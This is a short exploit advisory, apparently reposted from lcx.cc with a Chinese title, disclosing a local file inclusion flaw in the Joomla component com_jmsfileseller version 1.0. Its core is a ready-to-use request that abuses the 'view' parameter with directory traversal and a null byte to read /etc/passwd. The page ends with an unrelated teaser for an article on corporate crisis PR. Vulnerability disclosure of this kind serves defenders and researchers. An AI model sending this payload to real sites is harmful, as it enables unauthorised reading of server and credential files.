Joomla 组件 com_jmsfileseller 本地文件包含漏洞

# Exploit Title: Joomla Component com_jmsfileseller Local File Inclusion Vulnerability
# Date: 28.05.2011
# Author: Valentin
# Category: webapps/0day
# Version: 1.0

# Tested on:
# CVE :
# Code :

[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla Component com_msfileseller Local File Inclusion Vulnerability
Author = Valentin Hoebel
Contact = [email protected]

[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = JMS FileSeller
Vendor = Joommasters team
Vendor Website = http://joommasters.com/
Affected Version(s) = 1.0

[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> Local File Inclusion
URL: index.php?option=com_jmsfileseller&view=&cat_id=1&Itemid=27
Vulnerable parameters: view
Example: index.php?option=com_jmsfileseller&view=../../../etc/passwd%00&cat_id=12&Itemid=27

[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 28.05.2011

[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz = cr4wl3r, JosS, Todd and Josh from packetstormsecurity.org, exploit-db.com

[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

文章来源于lcx.cc:Joomla 组件 com_jmsfileseller 本地文件包含漏洞

相关推荐: 互联网公司如何做危机公关

一个公司在成长过程中，难免会遭遇一些公关事件，如果回应的很笨拙，则可能会变得很被动。所以虽然我不提倡主动挑起公关事件，但如果事情找上门来了，却也需要懂一些策略。我观察发现很多大公司，在危机公关上其实处理的都不好，最后的效果往往适得其反。 我从2001年开论坛当…